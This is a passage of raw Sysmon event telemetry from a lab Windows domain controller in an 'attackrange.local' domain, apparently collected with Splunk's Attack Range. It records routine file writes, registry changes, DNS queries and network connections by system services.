Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=630112BDD7B077B9DD7C1D2B317D8109,SHA256=39A95B49B3F9E5E04ECB630F05CE013B48B1342B9B9A4BBC1D7354DED048735D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000003699Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:52.908{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=85CC3D5974AD9388C73B3B88C689BC9A,SHA256=14CEB531AC834B2442FF152EAEF22ECD36FAE2606FBFBC91DCDC658FF1B8F47E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000003700Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:53.924{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=246B4891C80EBE7832800FF20BDF71B2,SHA256=4F834DBB24D77B4DF830390246C04174E9DBFEC626B860989E1572E683B3EB65,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000003701Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:54.924{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9832A33EF3C0246FDAD726AF7D7C09C0,SHA256=F331D0FA7EF7D3A90FB3C80066F393FEDC3D93BFBF9173C868308355956ABEF1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000003702Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:55.939{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5ACDD7D153A125B3576498E7BC2FCDC1,SHA256=5440630060172A08BC52DFF773822204711722671BC4079261D550CAE0B55BAC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000003703Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:57.002{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AD9C1DBC22AC32B5E20456870B0A4795,SHA256=EC4233ECC86645D72444B6E0E4A6FDB391936C1C3BD2FF56BDB1D7F1C4D6F27A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000003704Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:58.205{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1CFE2527AE03ED620C21212A33B8785E,SHA256=C3B1C77D179614B9F66F460C37EA50BC33384BC80D9D9BAD0C2F13DC7DB61300,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000003705Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:59.205{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DF6ED0E004B7E1CF31EB1651A4DF9A8D,SHA256=1E67B83C8BD6A50CB4779DD28EA0D7182DBB88EDCBD433027BC716D270D14905,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000003706Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:00.298{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2E253FEF935B586D3279B725F862C5E5,SHA256=4C7865979508B9E21E4C39A9559EB5B5C320C07D6FBF8AB56B4DFC772565CC10,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000003707Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:01.330{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F370B5BFF2AECDF7AFC1922AB36EB488,SHA256=65D5B5FB9C2C26A3F679DA173462231C7424895CBF974F014CB1F3125275B3F0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000003708Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:02.345{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4DB86816DDF4AC678F8D6EB19FD2C9A1,SHA256=47F9FC1BC48B085345F019F29025673B5747A3EEA33AFFBC87A37FF1ED0A1F02,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000003710Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:02.044{266CAFBE-646C-6064-0F00-00000000AE01}1116C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse46.128.24.64-53872-false10.0.1.14win-dc-892.attackrange.local3389ms-wbt-server 23542300x80000000000000003709Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:03.361{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=119B2518C04607706369A14937CA7EA9,SHA256=F2A95AE65FBAD1CA3CB633C58BFCBA67ECE49931860783F857A6FBCDA5539512,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000003731Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:04.955{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\iphlpsvc\Parameters\ADHarvest\LastFetchDomainATTACKRANGE 13241300x80000000000000003730Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:04.955{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\iphlpsvc\Parameters\ADHarvest\LastSuccessfulADS&SFetchBinary Data 13241300x80000000000000003729Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:04.955{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\iphlpsvc\Parameters\ADHarvest\LastFetchContents* 13241300x80000000000000003728Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:04.955{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Dnscache\Parameters\Probe\{e0c459ce-7fc4-4651-b291-1f61fb5721e9}\NetworkPerformsHijackingDWORD (0x00000000) 13241300x80000000000000003727Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:04.955{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Dnscache\Parameters\Probe\{e0c459ce-7fc4-4651-b291-1f61fb5721e9}\LastProbeTimeDWORD (0x606464bc) 13241300x80000000000000003726Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:04.955{266CAFBE-646C-6064-1200-00000000AE01}1196C:\Windows\system32\svchost.exeHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles\{E0C459CE-7FC4-4651-B291-1F61FB5721E9}\DateLastConnectedBinary Data 13241300x80000000000000003725Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:04.955{266CAFBE-646C-6064-1200-00000000AE01}1196C:\Windows\system32\svchost.exeHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles\{E0C459CE-7FC4-4651-B291-1F61FB5721E9}\NameTypeDWORD (0x00000006) 13241300x80000000000000003724Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:04.955{266CAFBE-646C-6064-1200-00000000AE01}1196C:\Windows\system32\svchost.exeHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles\{E0C459CE-7FC4-4651-B291-1F61FB5721E9}\DateCreatedBinary Data 13241300x80000000000000003723Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:04.955{266CAFBE-646C-6064-1200-00000000AE01}1196C:\Windows\system32\svchost.exeHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles\{E0C459CE-7FC4-4651-B291-1F61FB5721E9}\CategoryDWORD (0x00000002) 13241300x80000000000000003722Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:04.955{266CAFBE-646C-6064-1200-00000000AE01}1196C:\Windows\system32\svchost.exeHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles\{E0C459CE-7FC4-4651-B291-1F61FB5721E9}\ManagedDWORD (0x00000001) 13241300x80000000000000003721Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:04.955{266CAFBE-646C-6064-1200-00000000AE01}1196C:\Windows\system32\svchost.exeHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles\{E0C459CE-7FC4-4651-B291-1F61FB5721E9}\Descriptionattackrange.local 13241300x80000000000000003720Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:04.955{266CAFBE-646C-6064-1200-00000000AE01}1196C:\Windows\system32\svchost.exeHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles\{E0C459CE-7FC4-4651-B291-1F61FB5721E9}\ProfileNameattackrange.local 734700x80000000000000003719Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:04.877{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\System32\svchost.exeC:\Windows\System32\cryptdll.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptography ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptdll.dllMD5=4B31902F1E0B79CE7E46D9877647C1CC,SHA256=8925892119315293C49D09A26191149660934BF1E5D3D023722E90339ADA38AA,IMPHASH=CAB6D6025DF08B0D0BC6259D625E2778trueMicrosoft WindowsValid 10341000x80000000000000003718Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:04.798{266CAFBE-646A-6064-0B00-00000000AE01}856976C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003717Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:04.798{266CAFBE-646A-6064-0B00-00000000AE01}856976C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 13241300x80000000000000003716Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:04.798{266CAFBE-646C-6064-1100-00000000AE01}1200C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip6\Parameters\Interfaces\{b4aceb91-3521-4f28-a5f8-434384469e9a}\Dhcpv6StateDWORD (0x00000001) 13241300x80000000000000003715Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:04.798{266CAFBE-646C-6064-1100-00000000AE01}1200C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip6\Parameters\Interfaces\{b4aceb91-3521-4f28-a5f8-434384469e9a}\Dhcpv6StateDWORD (0x00000000) 13241300x80000000000000003714Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:04.736{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\tunnel\Enum\NextInstanceDWORD (0x00000002) 13241300x80000000000000003713Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:04.736{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\tunnel\Enum\CountDWORD (0x00000002) 13241300x80000000000000003712Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:04.736{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\tunnel\Enum\1SWD\IP_TUNNEL_VBUS\Teredo_Tunnel_Device 23542300x80000000000000003711Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:04.377{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=721D343F63BF93F8C80C9611A6C9090F,SHA256=482372BA06A61C2A455D3F83C51B962380A5502EA948A74E20E95A2BF7DABD22,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000003757Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:04.952{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local58089-true0:0:0:0:0:0:0:1win-dc-892.attackrange.local389ldap 354300x80000000000000003756Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:04.952{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local58089-true0:0:0:0:0:0:0:1win-dc-892.attackrange.local389ldap 354300x80000000000000003755Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:04.952{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local63185- 354300x80000000000000003754Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:04.846{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-892.attackrange.local58088-false10.0.1.14win-dc-892.attackrange.local389ldap 354300x80000000000000003753Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:04.846{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcptruefalse10.0.1.14win-dc-892.attackrange.local58088-false10.0.1.14win-dc-892.attackrange.local389ldap 354300x80000000000000003752Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:04.823{266CAFBE-646C-6064-1100-00000000AE01}1200C:\Windows\System32\svchost.exeNT AUTHORITY\LOCAL SERVICEudptruetruefe80:0:0:0:28de:33c1:f5ff:fef1-546dhcpv6-clienttrueff02:0:0:0:0:0:1:2-547dhcpv6-server 354300x80000000000000003751Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:04.794{266CAFBE-6467-6064-0100-00000000AE01}4SystemNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local58087-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local445microsoft-ds 354300x80000000000000003750Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:04.794{266CAFBE-6467-6064-0100-00000000AE01}4SystemNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local58087-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local445microsoft-ds 354300x80000000000000003749Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:04.743{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local49218-true0:0:0:0:0:0:0:1win-dc-892.attackrange.local49218- 22542200x80000000000000003748Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:05.239{266CAFBE-647C-6064-2B00-00000000AE01}2536WIN-DC-8920fe80::28de:33c1:f5ff:fef1;2001:0:2851:782c:28de:33c1:f5ff:fef1;fe80::8c4d:e56a:c9ce:fd2b;C:\Windows\System32\spoolsv.exe 22542200x80000000000000003747Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:04.990{266CAFBE-646C-6064-1000-00000000AE01}1124isatap.eu-central-1.compute.internal9003-C:\Windows\System32\svchost.exe 22542200x80000000000000003746Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:04.959{266CAFBE-646C-6064-1000-00000000AE01}1124win-dc-892.attackrange.local0fe80::28de:33c1:f5ff:fef1;fe80::8c4d:e56a:c9ce:fd2b;::ffff:10.0.1.14;C:\Windows\System32\svchost.exe 22542200x80000000000000003745Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:04.958{266CAFBE-646C-6064-1500-00000000AE01}1316eu-central-1.compute.internal1460-C:\Windows\System32\svchost.exe 22542200x80000000000000003744Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:04.958{266CAFBE-646C-6064-1500-00000000AE01}1316icozbeym1460-C:\Windows\System32\svchost.exe 22542200x80000000000000003743Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:04.852{266CAFBE-646C-6064-1500-00000000AE01}1316win-dc-892.attackrange.local0fe80::28de:33c1:f5ff:fef1;fe80::8c4d:e56a:c9ce:fd2b;::ffff:10.0.1.14;C:\Windows\System32\svchost.exe 22542200x80000000000000003742Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:04.799{266CAFBE-646C-6064-1100-00000000AE01}1200win-dc-892.attackrange.local0fe80::28de:33c1:f5ff:fef1;fe80::8c4d:e56a:c9ce:fd2b;::ffff:10.0.1.14;C:\Windows\System32\svchost.exe 22542200x80000000000000003741Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:04.739{266CAFBE-646C-6064-1000-00000000AE01}1124win10.ipv6.microsoft.com.0type: 5 onpremwindows.ipv6.microsoft.com.akadns.net;type: 5 trdovmssukwest.ipv6.microsoft.com.akadns.net;40.81.120.44;C:\Windows\System32\svchost.exe 23542300x80000000000000003740Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:05.752{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=515C4C759C39D858B32E2DEB50AED2EC,SHA256=A067E2C9F4C70BFB2F3F2E409532881F56B2BEE355FCF0E06B766D2AE1F6944D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000003739Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:05.752{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=72254F55CF93AFBB1C6AABEF241CFE28,SHA256=00516D08AB5AA350731E72EFC6C058059A6E2D52510155D0CFC636B70156678C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000003738Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:05.377{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F5E6B82BF32D13654DE3C4614E3E3C65,SHA256=83B02E4A0AF88D3EB2BB323B8D71ED531F62FE6EFA0D0651FED8C57655F848AD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000003737Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:05.283{266CAFBE-646A-6064-0B00-00000000AE01}856NT AUTHORITY\SYSTEMC:\Windows\system32\lsass.exeC:\Windows\System32\config\netlogon.dnsMD5=2313D5E228884E38771C53923B0754D9,SHA256=E529C5BC81C8B303489DDB297E5CD96210622B68E3CF428B20DFC94D02FEDB1B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000003736Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:05.283{266CAFBE-646A-6064-0B00-00000000AE01}856NT AUTHORITY\SYSTEMC:\Windows\system32\lsass.exeC:\Windows\System32\config\netlogon.dnbMD5=55AEC771B6D65782E89BC4D2E33DCA75,SHA256=85035B34144008C245E1B2F8E0BB38224A22A96EFE5393DF05ED860D96021EB9,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000003735Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:05.267{266CAFBE-646C-6064-1200-00000000AE01}1196C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d72625-0xaad87873) 13241300x80000000000000003734Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:05.236{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\Netlogon\Private\IPV6SocketAddressListBinary Data 13241300x80000000000000003733Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:05.236{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\Netlogon\Private\IPV6SocketAddressListBinary Data 13241300x80000000000000003732Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:05.142{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Epoch\EpochDWORD (0x00000617) 22542200x80000000000000003803Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:05.293{266CAFBE-646A-6064-0B00-00000000AE01}856_ldap._tcp.Default-First-Site-Name._sites.ForestDnsZones.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000003802Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:05.291{266CAFBE-646A-6064-0B00-00000000AE01}856_ldap._tcp.ForestDnsZones.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000003801Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:05.290{266CAFBE-646A-6064-0B00-00000000AE01}856ForestDnsZones.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000003800Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:05.288{266CAFBE-646A-6064-0B00-00000000AE01}856_ldap._tcp.Default-First-Site-Name._sites.DomainDnsZones.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000003799Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:05.287{266CAFBE-646A-6064-0B00-00000000AE01}856DomainDnsZones.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000003798Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:05.275{266CAFBE-646C-6064-1200-00000000AE01}1196wpad9003-C:\Windows\System32\svchost.exe 22542200x80000000000000003797Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:05.245{266CAFBE-646A-6064-0B00-00000000AE01}856_ldap._tcp.Default-First-Site-Name._sites.dc._msdcs.attackrange.local.0type: 33 ;10.0.1.14;C:\Windows\System32\lsass.exe 354300x80000000000000003796Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:05.278{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local62162- 354300x80000000000000003795Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:05.276{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local55822- 354300x80000000000000003794Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:05.276{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT 